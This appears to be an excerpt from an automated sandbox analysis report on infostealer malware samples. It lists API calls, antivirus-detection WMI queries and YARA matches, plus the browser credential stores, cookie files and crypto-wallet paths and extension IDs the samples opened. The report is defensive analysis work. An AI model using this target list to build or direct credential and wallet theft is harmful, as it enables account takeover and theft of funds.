Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_brotli.cp311-win_amd64.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe Code function: 13_2_0096A5B5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,13_2_0096A5B5
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe Code function: 13_2_009461F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,13_2_009461F0
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe Code function: 13_2_0097E68E _free,_free,_free,GetTimeZoneInformation,_free,13_2_0097E68E
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe Code function: 13_2_009493D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,13_2_009493D0
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2079863840.0000000001341000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2079619439.0000000001315000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.5079116984.000000000131E000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1481927220.0000000001322000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1508453490.0000000001337000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1508453490.0000000001314000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2079265890.0000000001338000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.5078654939.0000000001317000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 14.2.futors.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.amnew.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.futors.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.futors.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.amnew.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rapes.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.M6gQuZPvgY.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.rapes.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1046270812.0000000000241000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1634294018.0000000000171000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1039110891.0000000000241000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\amnew[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe, type: DROPPED
Source: Yara match File source: Process Memory Space: UD49QH6.exe PID: 6024, type: MEMORYSTR
Source: Yara match File source: 48.2.cronikxqqq.exe.3c89550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 49.2.cronikxqqq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 49.2.cronikxqqq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000031.00000002.1772447973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.1518189012.000000000043C000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1442265227.000000000043C000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.5645957689.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\m0wsoI3[1].exe, type: DROPPED
Source: Yara match File source: 48.2.cronikxqqq.exe.3c89550.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 48.0.cronikxqqq.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 48.2.cronikxqqq.exe.3c89550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1635997111.0000000000872000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\cronikxqqq[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe, type: DROPPED
Source: Yara match File source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: m0wsoI3.exe PID: 5132, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum-LTC
Source: UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Electrum\wallets\
Source: UD49QH6.exe, 00000010.00000003.1507260993.000000000138E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitA
Source: UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: exodus.conf.json
Source: UD49QH6.exe, 00000010.00000003.1467013696.0000000001337000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: info.seco
Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ElectrumLTC
Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \jaxx\Local Storage\
Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: passphrase.json
Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Ethereum\
Source: UD49QH6.exe, 00000010.00000003.1507260993.000000000138E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfoofkD
Source: UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: file__0.localstorage
Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: default_wallet
Source: UD49QH6.exe, 00000010.00000003.1466867227.0000000001393000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: multidoge.wallet
Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: seed.seco
Source: UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
